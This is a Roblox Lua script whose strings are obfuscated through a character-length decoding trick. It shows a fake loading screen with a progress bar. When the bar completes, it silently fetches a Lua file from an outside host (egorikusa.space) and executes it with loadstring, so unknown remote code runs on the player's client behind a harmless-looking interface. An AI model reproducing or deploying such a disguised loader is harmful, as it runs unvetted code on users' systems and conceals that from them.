function fBOLyMAVySdHXNfJhBEgVIN(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local screenGui = Instance.new(fBOLyMAVySdHXNfJhBEgVIN({'***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','***********************************************************************','*********************************************************************************************************************','*********************************************************************************************************'}))
local textLabel = Instance.new(fBOLyMAVySdHXNfJhBEgVIN({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','****************************************************************************','*************************************************************************************************','**************************************************************************************************','*****************************************************************************************************','************************************************************************************************************'}))
local loadingBarBackground = Instance.new(fBOLyMAVySdHXNfJhBEgVIN({'**********************************************************************','******************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'}))
local loadingBar = Instance.new(fBOLyMAVySdHXNfJhBEgVIN({'**********************************************************************','******************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'}))
local notification = Instance.new(fBOLyMAVySdHXNfJhBEgVIN({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','****************************************************************************','*************************************************************************************************','**************************************************************************************************','*****************************************************************************************************','************************************************************************************************************'}))

-- Set up the ScreenGui
screenGui.Parent = game.Players.LocalPlayer:WaitForChild(fBOLyMAVySdHXNfJhBEgVIN({'********************************************************************************','************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***********************************************************************','*********************************************************************************************************************','*********************************************************************************************************'}))

-- Set up the main label
textLabel.Size = UDim2.new(1, 0, 0, 50)
textLabel.Position = UDim2.new(0, 0, 0, 0)
textLabel.BackgroundColor3 = Color3.new(0, 0, 0)
textLabel.TextColor3 = Color3.new(1, 1, 1)
textLabel.Text = fBOLyMAVySdHXNfJhBEgVIN({'*******************************************************************************************************************','*****************************************************************************************************','************************************************************************************************************','******************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','********************************','****************************************************************************************************************************','********************************','*********************************************************************************************************************','**************************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','****************************************************************************************************'})
textLabel.Parent = screenGui

-- Set up the loading bar background
loadingBarBackground.Size = UDim2.new(0.8, 0, 0.05, 0)
loadingBarBackground.Position = UDim2.new(0.1, 0, 0.9, 0)
loadingBarBackground.BackgroundColor3 = Color3.new(1, 0, 0)
loadingBarBackground.Parent = screenGui

-- Set up the loading bar
loadingBar.Size = UDim2.new(0, 0, 1, 0)
loadingBar.Position = UDim2.new(0, 0, 0, 0)
loadingBar.BackgroundColor3 = Color3.new(0, 1, 0)
loadingBar.Parent = loadingBarBackground

-- Set up the notification
notification.Size = UDim2.new(1, 0, 0, 50)
notification.Position = UDim2.new(0, 0, 0.5, 0)
notification.BackgroundColor3 = Color3.new(0, 0, 0)
notification.TextColor3 = Color3.new(1, 1, 1)
notification.Text = fBOLyMAVySdHXNfJhBEgVIN({})
notification.Parent = screenGui

-- Loading animation
local function updateLoadingBar()
    local loadingTime = 5
    local increment = 0.02
    for i = 0, 1, increment / loadingTime do
        loadingBar.Size = UDim2.new(i, 0, 1, 0)
        notification.Text = fBOLyMAVySdHXNfJhBEgVIN({'****************************************************************************','***************************************************************************************************************','*************************************************************************************************','****************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*******************************************************************************************************'}) .. string.rep(fBOLyMAVySdHXNfJhBEgVIN({'**********************************************'}), (i * 3) % 3 + 1)
        wait(increment)
    end
end

-- Function to execute custom script
local function executeCustomScript()
    -- Insert your script here
    loadstring(game:HttpGet("https://egorikusa.space/f2574cab4c32274258dba4f0.lua", true))()
end

-- Show notification and run custom script
local function showNotification()
    notification.Text = fBOLyMAVySdHXNfJhBEgVIN({'***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','********************************','****************************************************************************','***************************************************************************************************************','*************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','********************************','***********************************************************************************','*********************************************************************************************************************','***************************************************************************************************','***************************************************************************************************','*****************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','******************************************************************************************************','*********************************************************************************************************************','************************************************************************************************************','************************************************************************************************************','*************************************************************************************************************************','*********************************'})
    wait(2)
    screenGui:Destroy()
    executeCustomScript()
end

-- Run the loading sequence
updateLoadingBar()
showNotification()
    
